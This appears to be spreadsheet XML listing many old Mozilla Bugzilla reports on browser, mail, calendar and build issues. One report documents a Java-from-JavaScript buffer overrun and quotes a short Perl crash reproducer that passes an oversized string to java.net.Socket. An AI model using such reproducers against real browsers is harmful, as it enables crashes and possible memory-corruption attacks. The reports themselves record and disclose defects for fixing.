Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7b) Gecko/20040309
When trying to save an image to the local disk nothing happens.
The Save as dialog does not pop up no file is stored on the local disk
The Javascript console reports the following error :
Error: Components.classes[fpContractID] has no properties
Source File: chrome://communicator/content/contentAreaUtils.js 
Line: 718
Reproducible: Always
Steps to Reproduce:
1. Open a page containing an image
2. Right click on 'Save image as'
other testcase:
1. Open a page containing an image
2. Right click on 'View Image'
3. Select File -&gt; 'Save Page as'
Actual Results:  
nothing happens. The file is not saved locally
Expected Results:  
The Save File dialog should pop up
Before including the fix for bug 235832 'Save image as' used to crash Mozilla.
Since this bug has been fixed the crashes do not occur anymore though the save
dialog does not appear anymore.
Build options :
--enable-default-toolkit=gtk2 --enable-calendar --enable-xft
--disable-postscript --disable-xprint --enable-crypto --disable-installer
--disable-debug --enable-optimize=-O3</t>
  </si>
  <si>
    <t>file-handling</t>
  </si>
  <si>
    <t>doeni.bug</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-490236</t>
  </si>
  <si>
    <t>Release Requests</t>
  </si>
  <si>
    <t>Please QA the Fujitsu-Siemens Partner Repack (3.0.10)</t>
  </si>
  <si>
    <t>Starting the QA review process on the 3.0.9 version of the FujitsuSiemens partner distribution of Firefox.
The repack worksheet is located at:
https://wiki.mozilla.org/Partnering:Repacks:Firefox3:FujitsuSiemens
3.0.10 installers are available from their respective locale directories at:
https://people.mozilla.com/files/partners/fujistsusiemens/3.0.10/
Please note that the installers until QA'd and digitally signed are password protected. Distributions will be publicly available once they are QA'd and signed.</t>
  </si>
  <si>
    <t>TOOLKIT-340743</t>
  </si>
  <si>
    <t>In FAYT mode after failed search hitting F3 (Find Again) switches find bar UI to non-minimal UI</t>
  </si>
  <si>
    <t>Something I didn't notice in bug 337654...
In FAYT hit F3 to see the next result -- UI switches to the generalized search UI.  Worse the timeout still fires because find UI doesn't directly correlate with the current find mode and the find bar (the non-minimalist version) disappears at timeout.</t>
  </si>
  <si>
    <t>TOOLKIT-495680</t>
  </si>
  <si>
    <t>Problems with import of downloads.rdf after switch to toolkit download manager</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1pre) Gecko/20090531 SeaMonkey/2.0b1pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1pre) Gecko/20090531 SeaMonkey/2.0b1pre
New bug as described in https://bugzilla.mozilla.org/show_bug.cgi?id=381157#c89
Reproducible: Always
Steps to Reproduce:
1. if already exists delete downloads.sqlite
2. start a download
3. in download manager dialog choose save file
Actual Results:  
After selecting save file it takes quite a long time until windows file selector opens (Probably in this time downloads.rdf is converted to downloads.sqlite - downloads.rdf file size is about 340K).
For every entry in downloads.rdf the error message x:\...\file.zip could not be saved because an unknown error occurred. Try saving to a different location. is displayed.
In error console there are several Error: too much recursion shown.
After clicking through all error messages the download manager window opens showing the file progress as finished/failed/canceled. 
But no file is really downloaded. 
The partition with the download directory would have enough space to save the files.
Expected Results:  
Import of downloads.rdf happens without error messages.
I tried to strip down downloads.rdf to reproduce the error with a smaller file. But unfortunately the error occurs only with the original file. Because a lot of private urls in the file I can't attach it to this bug. I will try to create a downloads.rdf that triggers this bug the next days.</t>
  </si>
  <si>
    <t>bugzilla.spam2</t>
  </si>
  <si>
    <t>CORE-130189</t>
  </si>
  <si>
    <t>font baseline incorrect for kannada fonts</t>
  </si>
  <si>
    <t>Viewing the above URL shows that Kannada fonts have a baseline that's
lower than that of English fonts. See the attached screenshot</t>
  </si>
  <si>
    <t>arun-public</t>
  </si>
  <si>
    <t>FIREFOX-480343</t>
  </si>
  <si>
    <t>Double clicking column title spikes CPU and causes Library window to minimize</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1b3pre) Gecko/20090226 Shiretoko/3.1b3pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1b3pre) Gecko/20090226 Shiretoko/3.1b3pre
If you click on History and then Show All History the Library window opens and if you double click on the Name Location Visit Date or other column name CPU usage spikes to 100% and the Library window will minimize and the current tab will be loaded with whatever link is highlighted in your history.  
However if you open the Library window and you look at Tags or All Bookmarks and then go back to the History and double click on the column name it only spikes the CPU as it sorts the History it doesn't minimize or open a highlighted link.
Reproducible: Sometimes
Steps to Reproduce:
1. Click History -&gt; Show All History
2. Double click on Name Location Visit Date etc.
Actual Results:  
CPU usage spikes to 100% the Library window minimizes and whatever link is highlighted is opened in the current tab.
Expected Results:  
1 click on the column name should sort it by default behavior. Double clicking should be whatever the default behavior is (undo maybe?).
https://bugzilla.mozilla.org/show_bug.cgi?id=480238 is most like related to this.</t>
  </si>
  <si>
    <t>geeknik</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-216612</t>
  </si>
  <si>
    <t>junk status not shown for courier imap servers</t>
  </si>
  <si>
    <t>from an aim conversation with david:
if we are talking to a server that does not support custom flags (like courier)
 could we easily fall back &amp; store junk flag status in the summary file?
David's answer on how we would do this:
 in the destination db record enough information about the msg hdrs that got
moved into it so that when we download the new headers we'd recognize them as
messages that need to have the flags set.  if you switch machines it'll fall
down...but it would work OK for most users. 
it should be easy enough to only do this when the server doesn't support user
defined keywords. We could probably just hash the headers and store the date
header and use those two to match</t>
  </si>
  <si>
    <t>WEBSITES-442805</t>
  </si>
  <si>
    <t>add Dave Eaves (eaves.ca) to Planet Mozilla</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: 
I've created a special blog feed:
http://feeds.feedburner.com/EavescaMozilla
So that only posts that I tag Mozilla will appear on the planet mozilla site.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>david_a_eaves</t>
  </si>
  <si>
    <t>CORE-183092</t>
  </si>
  <si>
    <t>Buffer overrun calling Java from JS</t>
  </si>
  <si>
    <t>from Georgi Guninski
http://www.guninski.com
There is a crash (signal 11 SIGSEGV) when passing long (tested with
&gt;130000) arguments to a lot of java objects from js.
Can't debug the javavm for unknown reasons so can't tell if it is
exploitable but may be.
Attached is java3.pl - perl cgi which demonstrates the problem 
with
-----
$a=gx130000
...
x=new java.net.Socket($a1234)
----
The console does not give chance to debug and reports the message:
....
Unexpected Signal : 11 occurred at PC=0x401c1b38
Function name=utf8_length__7UNICODEPUsi
Library=/opt/netscape7/plugins/java2/lib/i386/client/libjvm.so
....</t>
  </si>
  <si>
    <t>joshua.xia</t>
  </si>
  <si>
    <t>MOZILLA.ORG-189020</t>
  </si>
  <si>
    <t>Possible problem with zip packaging?</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0 QXW0340m)
Build Identifier: 
Nightly build file mozilla-win32-talkback.zip 11.432 KB 13.01.2003 13:11:00 
shows multiple crc errors:
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\xpt_dump.exe. The file is 
corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\xpt_link.exe. The file is 
corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\xpidl.exe. The file is 
corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\regExport.exe. The file is 
corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\regxpcom.exe. The file is 
corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\xpcshell.exe. The file is 
corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\xpicleanup.exe. The file 
is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\nssckbi.dll. The file is 
corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\ssl3.dll. The file is 
corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\README.txt. The file is 
corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\winEmbed.exe. The file is 
corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\mfcembed.exe. The fil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CRC failed in bin\components\jsdservice.xpt. 
The fil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CRC failed in bin\components\uriloader.xpt. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\urildr.dll. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\rdf.xpt. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\rdf.dll. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\gfx.xpt. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\gkgfxwin.dll. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\imgmng.dll. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\plugin.xpt. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\dom_base.xpt. 
The fil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CRC failed in bin\components\widget.xpt. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in 
bin\components\content_base.xpt. The fil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CRC failed in 
bin\components\layout_base.xpt. The file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\gklayout.dll. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\mork.dll. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\nsprefm.dll. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\embed_base.xpt. 
The fil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CRC failed in 
bin\components\webBrowser_core.xpt. The file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\editor.xpt. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in 
bin\components\accessibility.xpt. The file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\mozldap.xpt. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\search.xpt. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\regviewer.xpt. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\jsconsole-
clhandler.js. The fil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CRC failed in bin\components\xpinstal.dll. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\cookie.xpt. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in 
bin\components\nsDictionary.js. The file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\venkman-
service.js. The file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\chatzilla-
service.js. The file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in 
bin\components\universalchardet.dll. The file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\pipnss.xpt. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\msgbase.xpt. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\msgdb.xpt. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\msgnews.xpt. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\msgnews.dll. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\msgcompo.xpt. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\msgimap.xpt. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\addrbook.xpt. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in 
bin\components\nsLDAPPrefsService.js. The file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\mdn-service.js. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\msgsmime.xpt. 
The file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\components\talkback.cnt. 
The fil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CRC failed in bin\chrome\toolkit.jar. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\chrome\comm.jar. The file 
is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\chrome\inspector.jar. The 
fil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CRC failed in bin\chrome\embed.jar. The file 
is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\chrome\messenger.jar. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\chrome\chromelist.txt. The 
file is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in bin\chrome\embed-sample.jar. 
The fil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file bin\chrome\venkman\content\venkman\tests\ header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The archive is corrupt
!   S:\mozilla-win32-talkback.zip: CRC failed in 
bin\res\charsetalias.properties. The file is corrupt
!   S:\mozilla-win32-talkback.zip: The archive is corrupt
[...]
Reproducible: Always
Steps to Reproduce:
1. download moz. nigtly file
2. unzip
3. see errors
Expected Results:  
Correct ZIP file
Re-checked file integritiy with winrar and winzip latest versions.</t>
  </si>
  <si>
    <t>t.rother</t>
  </si>
  <si>
    <t>MOZILLA_LABS-381016</t>
  </si>
  <si>
    <t>Joey Addon - Status bar icon makes status bar grow few pixels in height</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Build Identifier: Joey version 0.2.0.9
The Joey status bar icon makes the status bar grow few pixels in height.
Reproducible: Always
Steps to Reproduce:
1. Install Joey Firefox addon.
2. Status bar is bigger
Expected Results:  
Same size statusbar
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3</t>
  </si>
  <si>
    <t>bacobart</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-320442</t>
  </si>
  <si>
    <t>Fehler in den aktuellen Helpfiles</t>
  </si>
  <si>
    <t>In den aktuellen XPI's haben ein paar Files unschÃ¶ne Fehler drinnen.
Betroffen sind:
shortcuts.xhtml ( fehlt)
mail_sec_help.xhtml (Doctype wird nicht mit ]&gt; geschlossen )
developer_tools.xhtml (Brandshortname falsch)</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-489774</t>
  </si>
  <si>
    <t>Quick range links don't work on new graph server</t>
  </si>
  <si>
    <t>The 1d 7d 14d 30d etc. links don't work on the new graph server.</t>
  </si>
  <si>
    <t>CALENDAR-757762</t>
  </si>
  <si>
    <t>[Linux] alarms too late / internal time wrong after resuming from sleep / suspend / hibernation mode</t>
  </si>
  <si>
    <t>I am using Lightning 1.4 with Mozilla/5.0 (X11 Linux x86_64 rv:12.0) Gecko/20120429 Firefox/12.0 SeaMonkey/2.9.1.
Since one of the latest Lightning updates (I think it was 1.3) I noticed that alarm popups very often appear to late. With Lightning 1.4 the new now indicator (the red bar) was new so now I see why the alarms appeared too late: the time that Lightning keeps internally often lags behind the real time.
A specialty of my setup may be that I am using it on a Laptop that I frequently suspend. After waking up I see that the software clock of the system is correct while it takes Lightning at least a few minutes (sometimes half an hour) to notice that it was wrong. Just now I woke the laptop up in the morning the system time clock showed 09:22:32 (Wed 23 May 2012) but Lightning's red line was at ~22:45 on Wed 23 May.
While I am typing this I set up a test event at 09:42 with an alarm 0 minutes before. It is now 09:46:00 and the alarm still hasn't shown up and the red indicator is still a bit above the alarm.
This is unacceptable.</t>
  </si>
  <si>
    <t>matthew.mecca</t>
  </si>
  <si>
    <t>CORE-322889</t>
  </si>
  <si>
    <t>Array implementation should specialize its own nearly-native JSObjectOps</t>
  </si>
  <si>
    <t>See bug 322135 comment 5 bug 101964 bug 171262 bug 253138 and probably others.
/be</t>
  </si>
  <si>
    <t>TESTOPIA-357292</t>
  </si>
  <si>
    <t>Group controls on test plans.</t>
  </si>
  <si>
    <t>Similar to bugs we need to have the ability to limit access to test plans (and their associated objects) based on product groups.</t>
  </si>
  <si>
    <t>CORE-34032</t>
  </si>
  <si>
    <t>double click select fails in new text input field</t>
  </si>
  <si>
    <t>If I open a new window and then immediatelly double click on the URL in the
location bar the text doesn't get selected.
I have to triple click which is very annoying. This is only the first time it
works fine later (whether the window is selected or not).</t>
  </si>
  <si>
    <t>radha</t>
  </si>
  <si>
    <t>Marko.Macek</t>
  </si>
  <si>
    <t>FIREFOX-489258</t>
  </si>
  <si>
    <t>[MSFT-12113] Firefox window doesn't maintain docked position when minimized and restored.</t>
  </si>
  <si>
    <t>Description of the Problem: Firefox window doesn't maintain docked position when minimized and restored.
Detailed Steps to Reproduce the Problem:  
1.	Install Windows 7
2.	Install Firefox from www.firefox.com
3.	Launch Firefox
4.	Dock it to the right of the screen using mouse 
5.	Minimize Firefox (using the minimize button or Winkey + M)
6.	Restore Firefox by clicking on the icon in the Superbar
7.	Actual Result - Firefox is restored to its location before it was docked to the right of the screen
Note:  This behavior is not consistent with other Internet Browsers: Internet Explorer.
Tester/Developer Notes: 
Firefox was installed on a machine and launched.  The size of the window of Firefox was adjusted using the WinKey +M and then re-sized using the icon on the Superbar however Firefox did not resume it original position on the screen.
Al's Note: I don't see the Superbar (just gadgets) in the public build of Windows 7 so I was unable to verify this bug. Marking this for 1.9.1 by default but we should find out what version of Firefox was used and if we can get access to a more current Windows 7 build.</t>
  </si>
  <si>
    <t>CORE-486052</t>
  </si>
  <si>
    <t>[FIX]ASSERTION: unexpected second call to SetInitialChildList with r&amp;a pos table-footer-group</t>
  </si>
  <si>
    <t>Created attachment 370130
testcase
###!!! ASSERTION: unexpected second call to SetInitialChildList: 'Not Reached' file /Users/jruderman/central/layout/generic/nsContainerFrame.cpp line 111
###!!! ASSERTION: Frames getting lost!: 'NS_SUCCEEDED(rv)' file /Users/jruderman/central/layout/base/nsCSSFrameConstructor.cpp line 1320
###!!! ASSERTION: Some objects allocated with AllocateFrame were not freed: 'mFrameCount == 0' file /Users/jruderman/central/layout/base/nsPresShell.cpp line 681
Security-sensitive because the last assertion is often scary and I'm in a hurry.</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-554283</t>
  </si>
  <si>
    <t>Add-ons &amp; Plugins</t>
  </si>
  <si>
    <t>missing metadata errors on the console</t>
  </si>
  <si>
    <t>the console displays missing metadata for many plugins that clearly have 
legal metadata (UICommands JavaScript Editor Canon FileCommands...) In 
fact it could be listing that for all plugins. I get 29 errors in Firebug when 
I load up Bespin.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-416983</t>
  </si>
  <si>
    <t>staging automation prestage should fire after slave_prestage</t>
  </si>
  <si>
    <t>Created attachment 302798
move main prestage builder to fire after slave prestage
Nick just pointed out a failure on 1.8 staging. Rsync and the linux prestage were running at the same time which caused rsync to fail out. The slave prestage steps don't take long so we should just block the main prestage on them.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-140578</t>
  </si>
  <si>
    <t>streetparade.ch - doesn't support Mozilla / Netscape 6</t>
  </si>
  <si>
    <t>When visiting http://www.streetparade.com or http://www.streetparade.ch
Mozilla and Netscape 6 get redirected to an error page saying:
BROWSER NOT SUPPORTED.
Due to an improper implementation of Flash 5 in Netscape 6 for Windows you can
not view the official version of our page.
To access the basic information about Street Parade you can visit our simplified
HTML page.
To enjoy all the features of the Street Parade Community Site including
messaging system soundmixer and subscriptions to our newsletter use your
Internet Explorer or any other browser version 4 or above.</t>
  </si>
  <si>
    <t>hkoenig69</t>
  </si>
  <si>
    <t>SEAMONKEY-57200</t>
  </si>
  <si>
    <t>Need to be able to build embedding separately from seamonkey</t>
  </si>
  <si>
    <t>We need the ablity to build the base embedding requirements from the mozilla
tree without having to build unneeded components such as seamonkey specific
bits mailnews ect.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-261133</t>
  </si>
  <si>
    <t>joins.com - Unable to render the left hand side of the page.  Text is stacked on top of text rendering the page unreadable.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 rv:1.7.3) Gecko/20040914 Firefox/0.10
Build Identifier: Mozilla/5.0 (X11 U Linux i686 rv:1.7.3) Gecko/20040914 Firefox/0.10
The left hand side of the page has a menu of some kind rendered in javascript
(what kind I don't know because It's not obvious.) The text for the left hand
side of the page is layed on top of text on top of text.  This occurs in Mozilla
1.7 and 1.8 as well as Firefox 1.0pre
Reproducible: Always
Steps to Reproduce:
1.Go to the site.
2. let the site load
3. look left.
Actual Results:  
See the description.
Expected Results:  
menu on the left with readable links.
Theme etc has no affect Same problem on all current Mozilla and FireFox
browsers. If I turn off javascript the site seems to render correctly.  In part.</t>
  </si>
  <si>
    <t>chinese-simplified</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-725812</t>
  </si>
  <si>
    <t>Release Notes for Camino 2.1.1</t>
  </si>
  <si>
    <t>CORE-223536</t>
  </si>
  <si>
    <t>Exposing XPConnect jsval  nsIVariant to conversion functionality</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6a) Gecko/20031016 Firebird/0.7+
While adding scripting to a mozilla based application I need to be able to
convert between nsIVariant's and jsvals. The code for this exists in XPConnect
but is not exposed. 
Instead of reinventing the wheel in app I'd like to suggest exposing this
functionality. I'd imagine it would be beneficial to other developers as well.
Included is a patch which exposes the conversions as a service.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>COMPOSER_GRAVEYARD-356959</t>
  </si>
  <si>
    <t>COMPOSER_GRAVEYARD</t>
  </si>
  <si>
    <t>Update window title and tab label</t>
  </si>
  <si>
    <t>Update window title and tab label on document load and tab select.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-115747</t>
  </si>
  <si>
    <t>NS_THEME_TREEVIEW* implementations (Mac)</t>
  </si>
  <si>
    <t>This covers the implementation of NS_THEME_TREEVIEW NS_THEME_TREEVIEW_TREEITEM
NS_THEME_TREEVIEW_TWISTY NS_THEME_TREEVIEW_LINE NS_THEME_TREEVIEW_HEADER
NS_THEME_TREEVIEW_HEADER_CELL and NS_THEME_TREEVIEW_HEADER_SORTARROW for XUL
tree views on Mac.</t>
  </si>
  <si>
    <t>CORE-520581</t>
  </si>
  <si>
    <t>[HTML5][Patch] HTML5 parser reverses attributes on some elements</t>
  </si>
  <si>
    <t>Created attachment 404638
Testcase
STEPS TO REPRODUCE:
1)  Enable HTML5 parser.
2)  Load attached testcase.
3)  Examine the string shown.
EXPECTED RESULTS:  
ACTUAL RESULTS: 
I've tried some other elements like  and  and  and .   has the same issue.  The others don't seem to.</t>
  </si>
  <si>
    <t>BUGZILLA-234100</t>
  </si>
  <si>
    <t>redundant join criterion in fulltext search</t>
  </si>
  <si>
    <t>Search.pm includes the longdescs table on fulltext searches via a criterion in
an ON clause and another in the WHERE clause.  It only needs one of them.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-373928</t>
  </si>
  <si>
    <t>Stage MozillaBuild 1.1</t>
  </si>
  <si>
    <t>I need to have MozillaBuild 1.1 staged:
Source: http://benjamin.smedbergs.us/tests/MozillaBuildSetup-1.1RC4.exe
md5sum: a2deefd320d0664dd121388b41f9e709
Target: http://ftp.mozilla.org/pub/mozilla.org/mozilla/libraries/win32/MozillaBuildSetup-1.1exe
I have tagged the sources with MOZILLABUILD_1_1_RELEASE</t>
  </si>
  <si>
    <t>CORE-325418</t>
  </si>
  <si>
    <t>Calling init function of NsiTimer after calling cancel will add new time to old time.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
I was writing an extension that has a periodic and I wanted to have the option to change the interval at which it runs.
To do this I created a NsiTimer using the createInstance function and store the object as a global variable and used the init() function to start it with a type of TYPE_REPEATING_PRECISE.  When the user changes the interval at which the periodic should run I issue a cancel on the timer and then another init with the new interval value.  The problem is that any future calls to init will have the interval passed in that call added to the original interval from the first time the init was called.
So for example if I start the timer originally with a periodic of 5 minutes and the user changes it to 1 minute the timer will start running at 6 minutes.
I found a work around for this.  Basically after I issue the cancel I have to issue another createInstance call which will destroy the current timer and create a new one.  According to the documentation at http://www.xulplanet.com/references/xpcomref/ifaces/nsITimer.html this shouldn't be necessary since the cancel should clear out the timer.
Reproducible: Always
Steps to Reproduce:
1.  Create TYPE_REPEATING_PRECISE NsiTimer and initialize with an interval of X seconds.
2.  Cancel this timer and reinitialize with an interval of Y seconds.
Actual Results:  
Timer will now expire every X+Y seconds.
Expected Results:  
Timer should expire every Y seconds.
I wrote an extension which will create a timer of 5 seconds and then change it everytime it expires.  It logs the times it takes to expire and how long it should take in the javascript console.  It stops after 6 changes.
Notice that the new timer will always expire 5 seconds after it was set to because it adds in the original 5 seconds.  
To make it work correctly add the following line after the cancel in StartTimer():
    gtimer_test_function.timer = Components.classes[@mozilla.org/timer1].
         createInstance(Components.interfaces.nsITimer)</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-501680</t>
  </si>
  <si>
    <t>Create a Include Lightning checkbox for the try server</t>
  </si>
  <si>
    <t>It would be nice to simplify including lightning when doing tryserver builds. Currently one has to include a patch that adds lightning to mail's packages-static and upload a mozconfig that include --enable calendar.
A possible solution would be to add a checkbox (that is only enabled for mail) that takes care by adding lines to packages-static and adding --enable-calendar to the mozconfig</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-336044</t>
  </si>
  <si>
    <t>Need a way to mark an add-on as needing admin review.</t>
  </si>
  <si>
    <t>Any reviewer should be able to mark an extension as needing admin review (or questionable perhaps) to help get attention for hard cases or possible abuse. 
They could use this during review to call out cases that are in blurry policy areas or after approval to draw attention to an extension that may have a serious issue.</t>
  </si>
  <si>
    <t>CORE-515192</t>
  </si>
  <si>
    <t>Update cairo to 655a4dbc36d95ce4a82cbc13aa9e2002b41fa4de</t>
  </si>
  <si>
    <t>CORE-959199</t>
  </si>
  <si>
    <t>Panning and Zooming</t>
  </si>
  <si>
    <t>[APZC-only] Calling preventDefault on the contextmenu event does not prevent the click event.</t>
  </si>
  <si>
    <t>STR:
1. loads https://everlong.org/mozilla/testcase-contextmenu/ in the browser
2. longpress in the middle of the page
Expected:
* we get only the contextmenu event
Actual:
* we get both the contextmenu and the click event
qawanted: please test the STR in 1.3 I only tested in 1.4. Thanks !
Assigning to Dale per request.</t>
  </si>
  <si>
    <t>dharvey</t>
  </si>
  <si>
    <t>felash</t>
  </si>
  <si>
    <t>CORE-308405</t>
  </si>
  <si>
    <t>@mozilla.org/security/hash1 incorrectly invoked as a service in nsHttpDigestAuth.cpp</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
Per Doug Turner the CryptoHash component (@mozilla.org/security/hash1)
should not be used as a service as it appears to be in nsHttpDigestAuth.cpp:
http://lxr.mozilla.org/seamonkey/source/netwerk/protocol/http/src/nsHttpDigestAuth.cpp#66
Reproducible: Always</t>
  </si>
  <si>
    <t>cmelhorn</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-322870</t>
  </si>
  <si>
    <t>Hendrix</t>
  </si>
  <si>
    <t>Move Hendrix to point at the new mozilla.feedback newsgroup</t>
  </si>
  <si>
    <t>Hendrix currently posts to netscape.public.beta.feedback.  This was a stopgap measure until the new newsgroup hierarchy was in place (whis it will be within the next hour or two).
Hendrix needs to be changed to point at mozilla.feedback instead.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-155685</t>
  </si>
  <si>
    <t>Indicate bookmarks toolbar folder not deletable</t>
  </si>
  <si>
    <t>I do not want to have toolbar bookmarks I don't feel that there are any links
important enough to merit a button in my browser.
Chimera insists on creating a 'Toolbar Bookmarks' folder in my bookmarks that it
will not allow me to delete if I delete it by manually editing the
bookmarks.xml it creates a new one.</t>
  </si>
  <si>
    <t>peganthyrus</t>
  </si>
  <si>
